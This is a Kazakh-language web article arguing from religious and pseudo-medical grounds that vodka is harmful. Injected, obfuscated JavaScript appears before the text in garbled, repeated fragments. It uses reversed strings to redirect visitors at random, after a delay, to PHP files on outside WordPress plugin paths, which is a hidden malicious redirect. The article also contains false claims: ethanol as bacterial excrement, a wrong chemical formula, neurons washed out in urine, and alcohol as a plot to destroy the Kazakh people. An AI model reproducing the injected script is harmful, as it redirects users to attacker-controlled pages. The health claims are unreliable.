2024-07-27

Арақтың зияны

fc87f86004c91784012e500e296d4d4f$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/fc87f86004c91784012e500e296d4d4f.jpg» width=»328″ height=»247″ />Негізінен Құранда пайғамбарымыз (с.ғ.с) хадисінде халал мен харам анық ажыратылған. Бұл туралы имамдарымыз халыққа аузы талмай айтуда.
Қазір халқымыздың көп бөлігі  зайырлы білімді үйіп-төгіп алған соң, өздерін білімді санап харам-халал туралы онша тыңдағысы келмейді. Сол халық үшін халал медициналық көзқараспен түсіндіріліп айтылады.
Құранда арақ нәжістен жасалады делінген. Нәжіс деген сөздің қазақша мағынасы боқ-сідік, ғылыми атауы экскримент. Арақтың жасалу тәртібінде мынандай технология пайдаланылады: үлкен ыдысқа бидайдың немесе жүзімнің шырыны, сөлі құйылып толтырылады. Бұл шырынның құрамында сахароза, фруктоза сияқты адамның денсаулығына пайдалы тәтті заттар бар. Сол ыдыстағы шырын сұйығына ашытқы (дрожжевой) бактериялары жіберіледі. Ол бактериялар сол пайдалы тәттіні ішіп жеп тойған соң, үлкен-кіші дәретін сындырады. Осы бактериялардың үлкен-кіші дәреті С2Н2ОН яғни этил спирті болып табылады.
Этил спирті (С2Н2ОН) наркотикалық, протоплазматикалық У (яд). Спиртті соғыс кезінде наркоз ретінде пайдаланған, артық мөлшерде ішсе адам өліп қалатын болған.
Этил спиртінің (С2Н5ОН) 1972 жылы (ГОСТ 18300 -72 п. 5.1) 26.12.1972 № 2329 қауіпсіздік талаптары: Этил спирті тез жанғыш түссіз сұйық зат, өзіне лайықты иісі бар. Ықпалы күшті наркотикалық әсері бар, алғашқыда орталық нерв жүйесін қоздырады, ал сосын нерв жүйесін істен шығарады (паралич).
Спирт еріткіш зат, тамырдың ішіндегі қызыл қан түйіршіктерінің (эритроциттер) сыртында әлсіз зарядталған екі қабат майлы қабыршақ (пленка) қаптап тұрады. Сол қабыршақты (пленканы) спирт ерітеді де, ол эритроциттер бір-бірімен қара жүзім сияқты қосылып жабысады (слейка эритроцитов). Сол жабысқақ эритроциттер  мидағы өте кішкентай нейрондарға оттегін жеткізбей, олар өле бастайды. Адамның миында 15 миллиардтан астам нейрон бар, соның жартысы ғана жұмыс істейді. Адамның денесіндегі +36,6 градус температура себебінен өлген нейрондар шіриді. Алла Тағаланың құдіретімен денеміздегі су иммунитет арқылы сол мидағы шіріген, өлген нейрондарды жуып шайып, ол зәріміз арқылы сыртқа төгіледі. Осы жағдай (процесс) болып жатқанда адам «ойбай басым» деп ауырады.
Арақ ішкен адамның миындағы нейрондар төгілген соң ойлау, есте сақтау қабілеті жоғалады, әлсірейді. Шайтанның арбауына түсіп харам ішкен соң, арақ ішкіштер үлкен күнә істейді. Арақ харам болған соң, адамды хайуанның дәрежесіне түсіреді. Зұлымдыққа апарады, еркектік қасиетті әлсіретіп, ұрықты құртады, соның салдарынан келешекте дүниеге келетін дені сау ұрпақты жояды. Бұл біздің қазақ елін жер бетінен құрту мақсатында қолданып отырған жымысқы амал. Аңқау елге арамза молда дегендей, халқымыздың адал ниеті мен ақ пейілін осылай арақпен улап, көз алдымызда халқымыз азғындыққа ұшырады. Қаншама кісі өліп, қаншама жесірлер мен жетімдер қалды. Міне, харамнан келетін зиян. Арақты ішкендер тез маскүнемге айналады, ештеңеге жарамайтын арам адамға айналады. Харамның азы да, көбі де харам.
Бірақ, спиртті дәрі жасау, дәрігерлік жағдайда ғана қолданса болады, ал мынадай дүкендерді толтырып қойып, арақ (харамды) сату ең соңғы дәрежедегі надандық, жалпы халыққа жасалған зұлымдық.{jcomments on}

Яндекс.Метрика